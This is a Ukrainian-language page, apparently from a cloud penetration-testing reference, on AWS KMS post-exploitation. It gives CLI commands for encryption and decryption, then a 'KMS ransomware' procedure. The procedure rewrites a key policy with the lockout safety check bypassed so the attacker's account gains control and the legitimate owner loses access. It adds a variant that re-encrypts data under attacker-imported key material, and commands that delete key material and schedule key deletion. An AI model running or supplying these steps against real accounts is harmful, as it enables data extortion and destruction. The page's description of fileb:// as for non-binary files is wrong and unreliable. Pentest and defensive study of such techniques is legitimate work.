AWS - KMS Постексплуатація

Reading time: 4 minutes

KMS

Для отримання додаткової інформації перегляньте:

AWS - KMS Enum

Шифрування/Дешифрування інформації

fileb:// та file:// є схемами URI, які використовуються в командах AWS CLI для вказівки шляху до локальних файлів:

• fileb://: Читає файл у бінарному режимі, зазвичай використовується для небінарних файлів.
• file://: Читає файл у текстовому режимі, зазвичай використовується для простих текстових файлів, скриптів або JSON, які не мають спеціальних вимог до кодування.

• Використовуючи симетричний ключ

# Encrypt data
aws kms encrypt \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--key-id f0d3d719-b054-49ec-b515-4095b4777049 \
--output text \
--query Plaintext | base64 \
--decode

• Використовуючи асиметричний ключ:

# Encrypt data
aws kms encrypt \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--plaintext fileb:///tmp/hello.txt \
--output text \
--query CiphertextBlob | base64 \
--decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
--ciphertext-blob fileb://ExampleEncryptedFile \
--encryption-algorithm RSAES_OAEP_SHA_256 \
--key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
--output text \
--query Plaintext | base64 \
--decode

KMS Ransomware

Атакуючий з привілейованим доступом до KMS може змінити політику KMS ключів і надати своєму обліковому запису доступ до них, видаливши доступ, наданий легітимному обліковому запису.

Тоді користувачі легітимного облікового запису не зможуть отримати доступ до будь-якої інформації будь-якої служби, яка була зашифрована цими ключами, створюючи простий, але ефективний програмний забезпечення для викупу над обліковим записом.

Також зверніть увагу на необхідність використання параметра --bypass-policy-lockout-safety-check (відсутність цієї опції в веб-консолі робить цю атаку можливою лише з CLI).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
--policy-name default \
--policy file:///tmp/policy.yaml \
--bypass-policy-lockout-safety-check

{
"Id": "key-consolepolicy-3",
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Enable IAM User Permissions",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<your_own_account>:root"
},
"Action": "kms:*",
"Resource": "*"
}
]
}

Загальний KMS Ransomware

Глобальний KMS Ransomware

Існує інший спосіб виконання глобального KMS Ransomware, який включатиме наступні кроки:

• Створити новий ключ з матеріалом ключа, імпортованим зловмисником
• Зашифрувати старі дані знову, зашифровані попередньою версією, новою.
• Видалити KMS ключ
• Тепер лише зловмисник, який має оригінальний матеріал ключа, зможе розшифрувати зашифровані дані

Знищити ключі

# Destoy they key material previously imported making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
--key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
--pending-window-in-days 7